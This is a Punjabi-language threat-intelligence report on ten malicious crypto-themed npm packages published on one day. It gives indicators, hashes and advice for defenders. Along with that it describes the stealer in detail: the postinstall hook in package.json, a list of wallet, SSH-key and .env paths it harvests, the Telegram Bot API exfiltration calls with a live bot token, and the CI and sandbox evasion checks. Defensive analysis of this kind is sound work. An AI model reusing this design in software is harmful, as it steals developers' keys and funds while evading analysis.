ਸੀਡਸਵੀਪ: ਦਸ ਖਤਰਨਾਕ ਐਨਪੀਐਮ ਕ੍ਰਿਪਟੋ ਪੈਕੇਜ

ਸੀਡਸਵੀਪ: ਦਸ ਕ੍ਰਿਪਟੋ-ਥੀਮ ਵਾਲੇ npm ਪੈਕੇਜ ਜੋ ਸਿਰਫ਼ ਉਦੋਂ ਚੱਲਦੇ ਹਨ ਜਦੋਂ ਕੋਈ ਨਹੀਂ ਦੇਖ ਰਿਹਾ ਹੁੰਦਾ

ਵਿਸ਼ਾ - ਸੂਚੀ

ਪੜ੍ਹਨਯੋਗ ਪੋਸਟਾਂ

ਦਿਲਚਸਪੀ ਵਾਲੀਆਂ ਨਵੀਨਤਮ ਪੋਸਟਾਂ

TL; ਡਾ

9 ਜੂਨ 2026 ਨੂੰ ਇੱਕ ਸਿੰਗਲ npm ਪ੍ਰਕਾਸ਼ਕ ਖਾਤਾ, aicrypto-xzggg, ਭੇਜਿਆ ਗਿਆ ਦਸ ਪੈਕੇਜ ਕ੍ਰਿਪਟੋ- ਅਤੇ ਵੈੱਬ3-ਸੁਆਦ ਵਾਲੇ ਨਾਵਾਂ ਨਾਲ — farming-tools-12, swap-sdk-87, defi-tools-39, wallet-sdk-9, ਅਤੇ ਛੇ ਹੋਰ।

ਹਰੇਕ ਪੈਕੇਜ ਇੱਕ ਤੋਂ ਇੱਕੋ ਜਿਹਾ ਪੇਲੋਡ ਚਲਾਉਂਦਾ ਹੈ postinstall ਹੁੱਕ। ਇੰਸਟਾਲ ਕਰਨ 'ਤੇ, ਇਹ ਜਾਂਚ ਕਰਦਾ ਹੈ ਕਿ ਇਹ CI ਦੇ ਅੰਦਰ ਚੱਲ ਰਿਹਾ ਹੈ ਜਾਂ ਸੈਂਡਬੌਕਸ ਦੇ ਅੰਦਰ - ਜੇਕਰ ਨਹੀਂ, ਤਾਂ ਇਹ ਵਾਲਿਟ ਕੀਸਟੋਰ, ਸੀਡ-ਫ੍ਰੇਜ਼ ਫਾਈਲਾਂ, SSH ਕੁੰਜੀਆਂ, ਅਤੇ ਪੜ੍ਹਦਾ ਹੈ। .env ਛੇ ਬਲਾਕਚੈਨ ਈਕੋਸਿਸਟਮ ਤੋਂ ਫਾਈਲਾਂ ਇਕੱਤਰ ਕਰਦਾ ਹੈ ਅਤੇ ਉਹਨਾਂ ਨੂੰ ਇੱਕ ਟੈਲੀਗ੍ਰਾਮ ਬੋਟ ਵਿੱਚ ਭੇਜਦਾ ਹੈ।

ਇੱਕ ਡਿਫੈਂਡਰ ਜਿਸ ਇੱਕੋ ਸੂਚਕ ਦੀ ਤੁਰੰਤ ਭਾਲ ਕਰ ਸਕਦਾ ਹੈ ਉਹ ਹੈ ਟੈਲੀਗ੍ਰਾਮ ਬੋਟ ਆਈਡੀ। 8227918239.

ਗੰਭੀਰਤਾ: ਨਾਜ਼ੁਕ — ਦਸਤਖਤ ਕਰਨ ਵਾਲੀਆਂ ਕੁੰਜੀਆਂ ਅਤੇ ਰਿਕਵਰੀ ਵਾਕਾਂਸ਼ਾਂ ਦੀ ਸਿੱਧੀ ਚੋਰੀ ਡਿਵੈਲਪਰ ਵਰਕਸਟੇਸ਼ਨ.

ਹਮਲਾ: ਇਹ ਕਿਵੇਂ ਕੰਮ ਕਰਦਾ ਹੈ

ਇਹ ਪੈਕੇਜ ਆਪਣੇ ਆਪ ਨੂੰ ਬਲਾਕਚੈਨ ਡਿਵੈਲਪਰ ਉਪਯੋਗਤਾਵਾਂ ਵਜੋਂ ਇਸ਼ਤਿਹਾਰ ਦਿੰਦੇ ਹਨ। ਪੈਕੇਜ.ਜਸਨ ਘੱਟੋ-ਘੱਟ ਹੈ ਅਤੇ ਇੰਸਟਾਲ ਜੀਵਨਚੱਕਰ ਨੂੰ ਇੱਕ ਸਕ੍ਰਿਪਟ 'ਤੇ ਇਸ਼ਾਰਾ ਕਰਦਾ ਹੈ:

{   "name": "farming-tools-12",   "main": "src/index.js",   "scripts": { "postinstall": "node scripts/postinstall.js" },   "keywords": ["web3", "crypto", "blockchain", "solana", "ethereum"],   "author": "Alex Smith",   "license": "MIT" }

ਸਕ੍ਰਿਪਟਾਂ/postinstall.js ਇੱਕ ਇੱਕ-ਲਾਈਨ ਸ਼ਿਮ ਹੈ ਜੋ ਅਸਲ ਪੇਲੋਡ ਨੂੰ ਲੋਡ ਕਰਦਾ ਹੈ: ਲੋੜ (“../src/index.js”). ਕਿਉਂਕਿ ਪੋਸਟਇੰਸਟਾਲ ਦੌਰਾਨ ਆਪਣੇ ਆਪ ਚੱਲਦਾ ਹੈ npm ਇੰਸਟਾਲ, ਡਿਵੈਲਪਰ ਦੁਆਰਾ ਕੋਈ ਕੋਡ ਆਯਾਤ ਕਰਨ ਦੀ ਲੋੜ ਨਹੀਂ ਹੈ — ਪੈਕੇਜ ਨੂੰ ਨਿਰਭਰਤਾ ਟ੍ਰੀ ਵਿੱਚ ਰੱਖਣਾ ਇਸਨੂੰ ਚਲਾਉਣ ਲਈ ਕਾਫ਼ੀ ਹੈ।

ਅੰਦਰ ਮਾਰਨ ਦੀ ਲੜੀ src/index.js ਚਾਰ ਕਦਮ ਹਨ:

  1. ਵਾਤਾਵਰਣ ਜਾਂਚ। ਇੱਕ ਗਾਰਡ ਫੰਕਸ਼ਨ ਇਹ ਫੈਸਲਾ ਕਰਦਾ ਹੈ ਕਿ ਹੋਸਟ ਇੱਕ ਬਿਲਡ ਏਜੰਟ ਵਰਗਾ ਦਿਖਦਾ ਹੈ ਜਾਂ ਵਿਸ਼ਲੇਸ਼ਣ ਸੈਂਡਬੌਕਸ।
  2. ਦੇਰੀ। ਐਗਜ਼ੀਕਿਊਸ਼ਨ ਨੂੰ ਇੱਕ ਦੇ ਪਿੱਛੇ ਮੁਲਤਵੀ ਕਰ ਦਿੱਤਾ ਗਿਆ ਹੈ ਸੈੱਟਟਾਈਮਆਊਟ ਲਗਭਗ 7.4 ਸਕਿੰਟ।
  3. ਸੰਗ੍ਰਹਿ. ਵਾਲਿਟ, ਕੁੰਜੀ, ਅਤੇ ਗੁਪਤ ਫਾਈਲ ਮਾਰਗਾਂ ਦੀ ਇੱਕ ਨਿਸ਼ਚਿਤ ਸੂਚੀ ਚੱਲਦੀ ਹੈ; ਮੌਜੂਦਾ ਫਾਈਲਾਂ ਕਤਾਰ ਵਿੱਚ ਹਨ।
  4. ਐਕਸਫਿਲਟਰੇਸ਼ਨ। ਕਤਾਰਬੱਧ ਫਾਈਲਾਂ ਇੱਕ ਟੈਲੀਗ੍ਰਾਮ ਬੋਟ ਨੂੰ ਭੇਜੀਆਂ ਜਾਂਦੀਆਂ ਹਨ, ਜਿਸ ਤੋਂ ਪਹਿਲਾਂ ਇੱਕ ਸੰਖੇਪ ਸੁਨੇਹਾ ਆਉਂਦਾ ਹੈ।

ਸੰਗ੍ਰਹਿ ਟੀਚਾ ਸੂਚੀ ਛੇ ਚੇਨਾਂ ਅਤੇ ਆਮ ਵਿਕਾਸਕਾਰ ਰਾਜ਼ਾਂ ਨੂੰ ਫੈਲਾਉਂਦੀ ਹੈ। ਛਾਂਟੀ ਕੀਤੀ ਗਈ:

~/.config/solana/id.json        ~/.ethereum/keystore ~/.solana/keypair.json          ~/.bitcoin/wallet.dat ~/.tron_wallet/keystore         ~/.sui/sui_config/sui.keystore ~/.aptos/key.txt                ~/.ssh/id_rsa , ~/.ssh/id_ed25519 ./wallet.json  ./keystore.json  ./mnemonic.txt  ./seed.txt ./seedphrase.txt  ./recovery.txt  ./private.key  ./.env  ./.env.local

ਕੁੱਲ ਇੱਕੀ ਮਾਰਗ। ਡਾਇਰੈਕਟਰੀ ਐਂਟਰੀਆਂ ਜਿਵੇਂ ਕਿ ~/.ਈਥਰਿਅਮ/ਕੀਸਟੋਰ ਫੈਲਾਏ ਜਾਂਦੇ ਹਨ ਅਤੇ ਅੰਦਰਲੀ ਹਰ ਫਾਈਲ ਕਤਾਰ ਵਿੱਚ ਹੁੰਦੀ ਹੈ। ਐਕਸਫਿਲਟਰੇਸ਼ਨ ਸਿੱਧੇ ਟੈਲੀਗ੍ਰਾਮ ਬੋਟ API ਦੀ ਵਰਤੋਂ ਕਰਦਾ ਹੈ — a ਸੁਨੇਹਾ ਭੇਜੋ ਇੱਕ ਹੋਸਟ ਅਤੇ ਫਾਈਲ ਸੰਖੇਪ ਨਾਲ ਕਾਲ ਕਰੋ, ਫਿਰ ਇੱਕ ਦਸਤਾਵੇਜ਼ ਭੇਜੋ ਹਰੇਕ ਫਾਈਲ ਲਈ ਮਲਟੀਪਾਰਟ ਅਪਲੋਡ:

ਪਾਠ ਨੂੰ

POST https://api.telegram.org/bot<token>/sendMessage POST https://api.telegram.org/bot<token>/sendDocument   (one per file)

ਕੋਡ ਦੁਆਰਾ ਇਕੱਠਾ ਕੀਤਾ ਜਾਣ ਵਾਲਾ ਸੰਖੇਪ ਸੁਨੇਹਾ ਸ਼ਾਬਦਿਕ ਸਤਰ ਨਾਲ ਸ਼ੁਰੂ ਹੁੰਦਾ ਹੈ। ਕ੍ਰਿਪਟੋ ਸਟੀਲਰ, ਉਸ ਤੋਂ ਬਾਅਦ ਹੋਸਟਨੇਮ, ਯੂਜ਼ਰਨੇਮ, ਓਰੀਜਨਿੰਗ ਪੈਕੇਜ ਨਾਮ, ਫਾਈਲ ਗਿਣਤੀ, ਅਤੇ ਟਾਈਮਸਟੈਂਪ।

ਇੱਥੇ ਨਵਾਂ ਕੀ ਹੈ?

ਵੱਖਰਾ ਕਰਨ ਵਾਲਾ ਕਾਰਕ ਚੋਰੀ ਦੀ ਵਿਧੀ ਨਹੀਂ ਹੈ — npm ਤੋਂ ਟੈਲੀਗ੍ਰਾਮ-ਅਧਾਰਿਤ ਐਕਸਫਿਲ ਪੋਸਟਇੰਸਟਾਲ hooks ਚੰਗੀ ਤਰ੍ਹਾਂ ਮਿੱਧਿਆ ਹੋਇਆ ਹੈ। ਇਹ ਹੈ ਐਗਜ਼ੀਕਿਊਸ਼ਨ ਗੇਟ। ਕੁਝ ਵੀ ਕਰਨ ਤੋਂ ਪਹਿਲਾਂ, ਪੇਲੋਡ ਇੱਕ ਫੰਕਸ਼ਨ ਨੂੰ ਕਾਲ ਕਰਦਾ ਹੈ ਜੋ ਸਹੀ ਵਾਪਸ ਕਰਦਾ ਹੈ ਜਦੋਂ ਹੋਸਟ ਇੱਕ CI ਰਨਰ ਜਾਂ ਸੈਂਡਬੌਕਸ ਵਰਗਾ ਹੁੰਦਾ ਹੈ, ਅਤੇ ਜਲਦੀ ਵਾਪਸ ਆਉਂਦਾ ਹੈ ਜਦੋਂ ਇਹ ਕਰਦਾ ਹੈ:

ਪਾਠ ਨੂੰ

isTestEnvironment() is true when ANY of:   - env CI == "true"  OR  GITHUB_ACTIONS == "true"  OR  JENKINS_HOME set   - env NODE_ENV in {test, development}   - username/USER contains: runner, sandbox, test, docker,     jenkins, gitlab, travis, circleci   - hostname contains: sandbox, test, ci   - hostname matches /^[a-f0-9]{12}$/   (a container-id shape)

ਕੰਟੇਨਰ-ਆਈਡੀ ਰੇਜੈਕਸ ਇੱਕ ਮਹੱਤਵਪੂਰਨ ਧਾਰਾ ਹੈ: ਇੱਕ 12-ਹੈਕਸ-ਅੱਖਰ ਹੋਸਟਨੇਮ ਡਿਫਾਲਟ ਸ਼ਕਲ ਹੈ ਜੋ ਡੌਕਰ ਇੱਕ ਨੂੰ ਨਿਰਧਾਰਤ ਕਰਦਾ ਹੈ ਕੰਟੇਨਰ, ਇਸ ਲਈ ਪੇਲੋਡ "ਮੇਰਾ ਹੋਸਟਨੇਮ ਡੌਕਰ ਕੰਟੇਨਰ ਵਰਗਾ ਲੱਗਦਾ ਹੈ" ਨੂੰ ਸੁਸਤ ਰਹਿਣ ਦੇ ਕਾਰਨ ਵਜੋਂ ਮੰਨਦਾ ਹੈ। ਸੱਤ-ਸਕਿੰਟ ਦੀ ਦੇਰੀ ਦੇ ਨਾਲ, ਡਿਜ਼ਾਈਨ ਇੱਕ ਡਿਵੈਲਪਰ ਦੇ ਅਸਲ ਵਰਕਸਟੇਸ਼ਨ 'ਤੇ ਚੱਲਣ ਅਤੇ ਕਿਤੇ ਵੀ ਚੁੱਪ ਰਹਿਣ ਦਾ ਸਮਰਥਨ ਕਰਦਾ ਹੈ ਜੋ ਆਟੋਮੇਟਿਡ ਵਿਸ਼ਲੇਸ਼ਣ ਵਰਗਾ ਦਿਖਾਈ ਦਿੰਦਾ ਹੈ। ਉਹ ਗੇਟ ਉਹ ਹੈ ਜਿਸਨੇ ਗਤੀਸ਼ੀਲ-ਵਿਸ਼ਲੇਸ਼ਣ ਸਿਗਨਲਾਂ ਨੂੰ ਦਬਾ ਦਿੱਤਾ ਅਤੇ ਸਥਿਰ ਐਕਸਫਿਲ ਪ੍ਰਵਾਹ ਨੂੰ ਪ੍ਰਾਇਮਰੀ ਦੋਸ਼ੀ ਸਬੂਤ ਵਜੋਂ ਰੱਖਿਆ।

ਟਾਈਮਲਾਈਨ

ਮਿਤੀ (UTC) ਘਟਨਾ
2026-06-09 ~02:48 ਪ੍ਰਕਾਸ਼ਨ 'ਤੇ ਫਲੈਗ ਕੀਤੇ ਗਏ ਕਲੱਸਟਰ ਦੇ ਪਹਿਲੇ ਪੈਕੇਜ (crypto-utils-7, ethereum-kit-1, web3-tools-9, solana-core-4, blockchain-helper-0)
2026-06-09 ~03:21–03:25 ਉੱਚ-ਵਰਜਨ ਵਾਲੇ ਮੈਂਬਰਾਂ ਨੂੰ ਫਲੈਗ ਕੀਤਾ ਗਿਆ (ethereum-kit-9 1.25.36 ਤੇ, wallet-sdk-9 3.7.73 ਵਜੇ)
2026-06-09 ~03:58–03:59 ਅੰਤਿਮ ਮੈਂਬਰਾਂ ਨੂੰ ਫਲੈਗ ਕੀਤਾ ਗਿਆ (defi-tools-39 4.26.29 ਤੇ, swap-sdk-87 4.63.78 ਤੇ, farming-tools-12 4.68.54 ਵਜੇ)
2026-06-09 ਸਾਰੇ ਦਸ ਵਰਗੀਕ੍ਰਿਤ ਖਤਰਨਾਕ ਅਤੇ ਰਜਿਸਟਰੀ ਹਟਾਉਣ ਲਈ ਰਿਪੋਰਟ ਕੀਤੇ ਗਏ

ਸਾਰੇ ਦਸ ਲਗਭਗ ਸੱਤਰ ਮਿੰਟਾਂ ਦੇ ਅੰਦਰ ਸਾਹਮਣੇ ਆਏ, ਇੱਕ ਖਾਤੇ ਤੋਂ ਚੱਲੇ ਇੱਕ ਸਕ੍ਰਿਪਟਡ ਪ੍ਰਕਾਸ਼ਨ ਦੇ ਅਨੁਸਾਰ।

ਸਮਝੌਤਾ ਦੇ ਸੂਚਕ

ਨੈੱਟਵਰਕ ਅਤੇ ਵਿਵਹਾਰਕ ਸੂਚਕ (ਹੋਸਟ ਡਿਫੈਂਜਡ):

ਸੂਚਕ ਮੁੱਲ
ਐਕਸਫਿਲ ਐਂਡਪੁਆਇੰਟ api[.]telegram[.]org (ਟੈਲੀਗ੍ਰਾਮ ਬੋਟ API)
ਟੈਲੀਗ੍ਰਾਮ ਬੋਟ ਆਈਡੀ 8227918239
ਬੋਟ ਟੋਕਨ 8227918239:AAGEMDrBZluDsBBYPxfSyMuv2l3FY8cZCcs
ਟੈਲੀਗ੍ਰਾਮ ਚੈਟ ਆਈਡੀ 6433587894
ਹੁੱਕ ਲਗਾਓ postinstallscripts/postinstall.jssrc/index.js
ਮਾਰਕਰ ਸਟ੍ਰਿੰਗ CRYPTO STEALER ਇਕੱਠੇ ਕੀਤੇ ਸੰਖੇਪ ਸੁਨੇਹੇ ਵਿੱਚ
ਪ੍ਰਕਾਸ਼ਕ aicrypto-xzggg (ਦੱਸੀ ਗਈ ਈਮੇਲ vipsyria88@gmail[.]com, ਅਣ-ਪ੍ਰਮਾਣਿਤ)

ਪੈਕੇਜ ਅਤੇ ਸੰਸਕਰਣ, ਹਰੇਕ ਦੇ SHA-256 ਦੇ ਨਾਲ src/index.js ਪੇਲੋਡ (ਪੇਲੋਡ ਕਾਰਜਸ਼ੀਲ ਤੌਰ 'ਤੇ ਇੱਕੋ ਜਿਹੇ ਹਨ ਅਤੇ ਸਿਰਫ਼ ਏਮਬੈਡਡ ਪੈਕੇਜ-ਨਾਮ ਲੇਬਲ ਵਿੱਚ ਵੱਖਰੇ ਹਨ, ਇਸ ਲਈ ਹਰੇਕ ਹੈਸ਼ ਵੱਖਰਾ ਹੈ):

HTML
ਪੈਕੇਜ ਵਰਜਨ src/index.js ਦਾ SHA-256
farming-tools-12 4.68.54 b50403be9dd9f94f7af4795c1e346c9d27d5a18041a3044773238c4cdc1f4de4
swap-sdk-87 4.63.78 9d96f8759e8d593b6dd2338aceb08cdb12e9a5613700953e04e66cc8c2e3087c
defi-tools-39 4.26.29 ddc5011b6173a57bc7f29b010ed6b71551dee253b5d05d3efc78d076f5351fee
wallet-sdk-9 3.7.73 ef4459281c64f1fe8923d703d416f04080ff1a2b7b385366f46d7cdb25731502
ethereum-kit-9 1.25.36 c43afad949027040c6414d26fa4eea6e2671d2572f9df7fd595e12baf204854f
ethereum-kit-1 1.0.0 1147f5227f3b13f65a438b31d87766c33affc65b7734a8658c95e0a4be1d2381
solana-core-4 1.0.0 93c65f971137d2753b5c57b685471bf5319bdc357fa863de56cbed8447cf576d
web3-tools-9 1.0.0 db97070bd349503f5703404493fc925448c2308c86708b33786309ebe6446a3d
crypto-utils-7 1.0.0 59f2fb112d6f17102fb4a70c8d12bfcbc93e9f0d170fe4451bad1aa4d5d74c92
blockchain-helper-0 1.0.0 053eb318980439d76eecac9847ae31ecf59654cf75ddcfebbdd9ce64bb98a0db

ਇੱਕ ਸਧਾਰਨ ਸ਼ਿਕਾਰ ਪੁੱਛਗਿੱਛ: ਦਸ ਨਾਵਾਂ ਵਿੱਚੋਂ ਕਿਸੇ ਲਈ ਵੀ ਇੰਸਟਾਲ ਲੌਗ ਅਤੇ ਲੌਕਫਾਈਲਾਂ ਦੀ ਖੋਜ ਕਰੋ, ਅਤੇ ਬਿਲਡ ਜਾਂ ਡਿਵੈਲਪਰ ਹੋਸਟਾਂ ਤੋਂ ਟੈਲੀਗ੍ਰਾਮ ਬੋਟ API ਨਾਲ ਕਨੈਕਸ਼ਨਾਂ ਲਈ ਆਊਟਬਾਊਂਡ ਟ੍ਰੈਫਿਕ ਦੀ ਖੋਜ ਕਰੋ ਜੋ ਇਸਦੀ ਵਰਤੋਂ ਨਹੀਂ ਕਰਦੇ ਹਨ।

ਵਿਸ਼ੇਸ਼ਤਾ ਅਤੇ ਨਿਰੀਖਣ ਕੀਤਾ ਵਿਵਹਾਰ

ਸਾਰੇ ਦਸ ਪੈਕੇਜ ਇੱਕ ਖਾਤੇ ਦੁਆਰਾ ਪ੍ਰਕਾਸ਼ਿਤ ਕੀਤੇ ਗਏ ਸਨ, ਏਕ੍ਰਿਪਟੋ-ਐਕਸਜ਼ੈਗਜੀ, ਜਿਸਦੀ ਦੱਸੀ ਗਈ ਈਮੇਲ ਹੈ vipsyria88@gmail[.]com. ਈਮੇਲ ਅਤੇ ਸਰੋਤ-ਨਿਯੰਤਰਣ ਲਿੰਕ ਦੋਵੇਂ ਰਜਿਸਟਰੀ ਮੈਟਾਡੇਟਾ ਵਿੱਚ ਪ੍ਰਮਾਣਿਤ ਨਹੀਂ ਹਨ, ਅਤੇ ਖਾਤੇ ਦਾ ਇੱਕ ਬਹੁਤ ਹੀ ਨਕਾਰਾਤਮਕ ਪ੍ਰਤਿਸ਼ਠਾ ਸਕੋਰ ਹੈ। ਅਸੀਂ ਇਸ ਗੱਲ ਦੀ ਪੁਸ਼ਟੀ ਨਹੀਂ ਕੀਤੀ ਹੈ ਕਿ ਖਾਤਾ ਕੌਣ ਚਲਾਉਂਦਾ ਹੈ।

ਕਿਸੇ ਵੀ ਪਛਾਣ ਦਾਅਵੇ ਤੋਂ ਦੋ ਵੇਰਵੇ ਵੱਖ ਕਰਨ ਦੇ ਯੋਗ ਹਨ। ਪਹਿਲਾਂ, ਪੈਕੇਜ.ਜਸਨ ਲੇਖਕ ਫੀਲਡ ਰੀਡਜ਼ ਐਲੇਕਸ ਸਮਿਥ ਹਰੇਕ ਪੈਕੇਜ 'ਤੇ, ਜਦੋਂ ਕਿ ਅਸਲ ਪ੍ਰਕਾਸ਼ਨ ਖਾਤਾ ਹੈ ਏਕ੍ਰਿਪਟੋ-ਐਕਸਜ਼ੈਗਜੀ; ਲੇਖਕ ਖੇਤਰ ਸਵੈ-ਘੋਸ਼ਿਤ ਮੈਟਾਡੇਟਾ ਹੈ ਅਤੇ ਲੇਖਕਤਾ ਸਥਾਪਤ ਨਹੀਂ ਕਰਦਾ ਹੈ। ਦੂਜਾ, ਸੰਸਕਰਣ ਨੰਬਰ ਵਿਆਪਕ ਤੌਰ 'ਤੇ ਵੱਖ-ਵੱਖ ਹੁੰਦੇ ਹਨ — ਕੁਝ ਮੈਂਬਰ ਇੱਥੇ ਬੈਠਦੇ ਹਨ 1.0.0, ਹੋਰਾਂ 'ਤੇ 4.68.54 — ਜੋ ਕਿ ਅਸਲ ਰੀਲੀਜ਼ ਇਤਿਹਾਸ ਨੂੰ ਬਣਾਈ ਰੱਖਣ ਦੀ ਬਜਾਏ ਤਾਜ਼ੇ ਬਣਾਏ ਪੈਕੇਜ ਨਾਵਾਂ ਵਿੱਚ ਇੱਕ ਸਿੰਗਲ ਪੇਲੋਡ ਦੀ ਮੁੜ ਵਰਤੋਂ ਦੇ ਅਨੁਕੂਲ ਹੈ।

ਸਾਰੇ ਕਲੱਸਟਰ ਵਿੱਚ ਵਿਵਹਾਰ ਇੱਕਸਾਰ ਹੈ: ਉਹੀ ਟਾਰਗੇਟ ਪਾਥ ਸੂਚੀ, ਉਹੀ ਟੈਲੀਗ੍ਰਾਮ ਬੋਟ ਆਈਡੀ ਅਤੇ ਚੈਟ ਆਈਡੀ, ਉਹੀ ਵਾਤਾਵਰਣ ਗੇਟ, ਉਹੀ ਕ੍ਰਿਪਟੋ ਸਟੀਲਰ ਮਾਰਕਰ। ਉਹ ਇਕਸਾਰਤਾ ਪੈਕੇਜਾਂ ਵਿਚਕਾਰ ਸਭ ਤੋਂ ਮਜ਼ਬੂਤ ​​ਕੜੀ ਹੈ। ਇਹ ਇੱਕ ਸਮਾਨ-ਆਪਰੇਟਰ ਸਿਗਨਲ ਹੈ, ਪਛਾਣ ਨਹੀਂ।

ਡਿਫੈਂਡਰਾਂ ਲਈ ਪ੍ਰਭਾਵ, ਰੁਝਾਨ ਅਤੇ ਮਾਰਗਦਰਸ਼ਨ

ਐਕਸਪੋਜ਼ਰ ਠੋਸ ਹੈ। ਇੱਕ ਡਿਵੈਲਪਰ ਜੋ ਇਹਨਾਂ ਵਿੱਚੋਂ ਕਿਸੇ ਵੀ ਪੈਕੇਜ ਨੂੰ ਇੱਕ ਵਰਕਸਟੇਸ਼ਨ 'ਤੇ ਸਥਾਪਿਤ ਕਰਦਾ ਹੈ ਜਿਸ ਵਿੱਚ ਇੱਕ ਸਾਫਟਵੇਅਰ ਵਾਲਿਟ, ਇੱਕ ਸੀਡ-ਫ੍ਰੇਜ਼ ਫਾਈਲ, ਜਾਂ ਇੱਕ SSH ਕੁੰਜੀ ਹੁੰਦੀ ਹੈ, ਉਹਨਾਂ ਫਾਈਲਾਂ ਨੂੰ ਸਕਿੰਟਾਂ ਦੇ ਅੰਦਰ ਹੋਸਟ ਤੋਂ ਪੜ੍ਹ ਅਤੇ ਪ੍ਰਸਾਰਿਤ ਕਰ ਦਿੱਤਾ ਜਾਂਦਾ ਹੈ। ਰਿਕਵਰੀ ਵਾਕਾਂਸ਼ ਅਤੇ ਸਾਈਨਿੰਗ ਕੁੰਜੀਆਂ ਦੀ ਮਿਆਦ ਸੈਸ਼ਨ ਟੋਕਨ ਵਾਂਗ ਨਹੀਂ ਖਤਮ ਹੁੰਦੀ; ਇੱਕ ਵਾਰ ਮੈਮੋਨਿਕ.txt ਜਾਂ ਸੋਲਾਨਾ ਆਈਡੀ.ਜੇਸਨ ਮਸ਼ੀਨ ਛੱਡ ਦਿੰਦੀ ਹੈ, ਇਸ ਦੁਆਰਾ ਨਿਯੰਤਰਿਤ ਫੰਡ ਉਦੋਂ ਤੱਕ ਜੋਖਮ ਵਿੱਚ ਰਹਿੰਦੇ ਹਨ ਜਦੋਂ ਤੱਕ ਉਹਨਾਂ ਨੂੰ ਤਬਦੀਲ ਨਹੀਂ ਕੀਤਾ ਜਾਂਦਾ। ਉਹੀ ਦੌੜ ਵੀ ਕੈਪਚਰ ਕਰਦੀ ਹੈ .env ਫਾਈਲਾਂ, ਜੋ ਨਿਯਮਿਤ ਤੌਰ 'ਤੇ API ਕੁੰਜੀਆਂ ਅਤੇ ਡੇਟਾਬੇਸ ਪ੍ਰਮਾਣ ਪੱਤਰ ਰੱਖਦੀਆਂ ਹਨ।

ਇਸ ਕਲੱਸਟਰ ਦੇ ਪਿੱਛੇ ਦੋ ਰੁਝਾਨ ਹਨ। ਪਹਿਲਾ ਹੈ ਕ੍ਰਿਪਟੋ- ਅਤੇ ਵੈੱਬ3-ਥੀਮ ਵਾਲੇ ਨਾਵਾਂ ਦੀ ਨਿਰੰਤਰ ਵਰਤੋਂ ਇੱਕ ਖਾਸ ਦਰਸ਼ਕਾਂ ਨੂੰ ਆਕਰਸ਼ਿਤ ਕਰਨ ਲਈ - ਡਿਵੈਲਪਰ ਜੋ ਵਾਲਿਟ ਅਤੇ ਕੁੰਜੀਆਂ ਉਸੇ ਮਸ਼ੀਨ 'ਤੇ ਰੱਖਦੇ ਹਨ ਜਿਸ 'ਤੇ ਉਹ ਨਿਰਭਰਤਾਵਾਂ ਸਥਾਪਿਤ ਕਰਦੇ ਹਨ। ਦੂਜਾ ਹੈ ਇੰਸਟਾਲ-ਟਾਈਮ ਪੇਲੋਡਾਂ ਵਿੱਚ ਸੈਂਡਬੌਕਸ ਚੋਰੀ ਦੀ ਪਰਿਪੱਕਤਾ। ਇੱਕ ਗੇਟ ਜੋ CI ਵਾਤਾਵਰਣ ਵੇਰੀਏਬਲ, ਰਨਰ ਉਪਭੋਗਤਾ ਨਾਮ, ਅਤੇ ਇੱਕ ਡੌਕਰ ਕੰਟੇਨਰ-ਆਈਡੀ ਹੋਸਟਨੇਮ ਆਕਾਰ ਦੀ ਜਾਂਚ ਕਰਦਾ ਹੈ, ਇੱਕ ਅਸਲ ਵਰਕਸਟੇਸ਼ਨ ਨਾਲੋਂ ਵਿਸ਼ਲੇਸ਼ਣ ਅਧੀਨ ਵੱਖਰੇ ਢੰਗ ਨਾਲ ਵਿਵਹਾਰ ਕਰਨ ਦਾ ਇੱਕ ਜਾਣਬੁੱਝ ਕੇ ਯਤਨ ਹੈ, ਅਤੇ ਇਹ ਪੂਰੀ ਤਰ੍ਹਾਂ ਗਤੀਸ਼ੀਲ ਖੋਜ ਲਈ ਬਾਰ ਨੂੰ ਵਧਾਉਂਦਾ ਹੈ।

ਡਿਫੈਂਡਰਾਂ ਲਈ:

ਡਿਫਾਲਟ ਤੌਰ 'ਤੇ ਅਯੋਗ ਸਕ੍ਰਿਪਟਾਂ ਨਾਲ ਇੰਸਟਾਲ ਕਰੋ। npm ਇੰਸਟਾਲ - ਅਣਡਿੱਠਾ-ਸਕ੍ਰਿਪਟਾਂ, ਜਾਂ ਸੈੱਟ ਕਰੋ ਅਣਦੇਖਾ-ਸਕ੍ਰਿਪਟਾਂ = ਸੱਚ in .npmrc, ਰੋਕਦਾ ਹੈ ਪੋਸਟਇੰਸਟਾਲ ਐਗਜ਼ੀਕਿਊਸ਼ਨ; ਸਿਰਫ਼ ਉਹਨਾਂ ਖਾਸ ਨਿਰਭਰਤਾਵਾਂ ਲਈ ਸਕ੍ਰਿਪਟਾਂ ਨੂੰ ਸਮਰੱਥ ਬਣਾਓ ਜਿਨ੍ਹਾਂ ਨੂੰ ਉਹਨਾਂ ਦੀ ਸੱਚਮੁੱਚ ਲੋੜ ਹੈ।

ਵਾਲਿਟ ਅਤੇ ਸਾਈਨਿੰਗ ਕੁੰਜੀਆਂ ਨੂੰ ਬਿਲਡ ਅਤੇ ਡਿਵੈਲਪਮੈਂਟ ਮਸ਼ੀਨਾਂ ਤੋਂ ਦੂਰ ਰੱਖੋ। ਇੱਕ ਹਾਰਡਵੇਅਰ ਵਾਲਿਟ ਜਾਂ ਇੱਕ ਸਮਰਪਿਤ, ਨਿਰਭਰਤਾ-ਮੁਕਤ ਸਾਈਨਿੰਗ ਹੋਸਟ ਦੀ ਵਰਤੋਂ ਕਰੋ।

ਇਲਾਜ .env, ਕੀਸਟੋਰ, ਅਤੇ ਸੀਡ-ਫ੍ਰੇਜ਼ ਫਾਈਲਾਂ ਨੂੰ ਤਾਜ ਦੇ ਗਹਿਣਿਆਂ ਵਜੋਂ। ਉਹਨਾਂ ਨੂੰ ਕਦੇ ਵੀ ਅਜਿਹੀ ਡਾਇਰੈਕਟਰੀ ਵਿੱਚ ਨਹੀਂ ਬੈਠਣਾ ਚਾਹੀਦਾ ਜੋ ਇੱਕ npm ਇੰਸਟਾਲ ਕੰਮ ਕਰਨ ਵਾਲਾ ਰੁੱਖ।

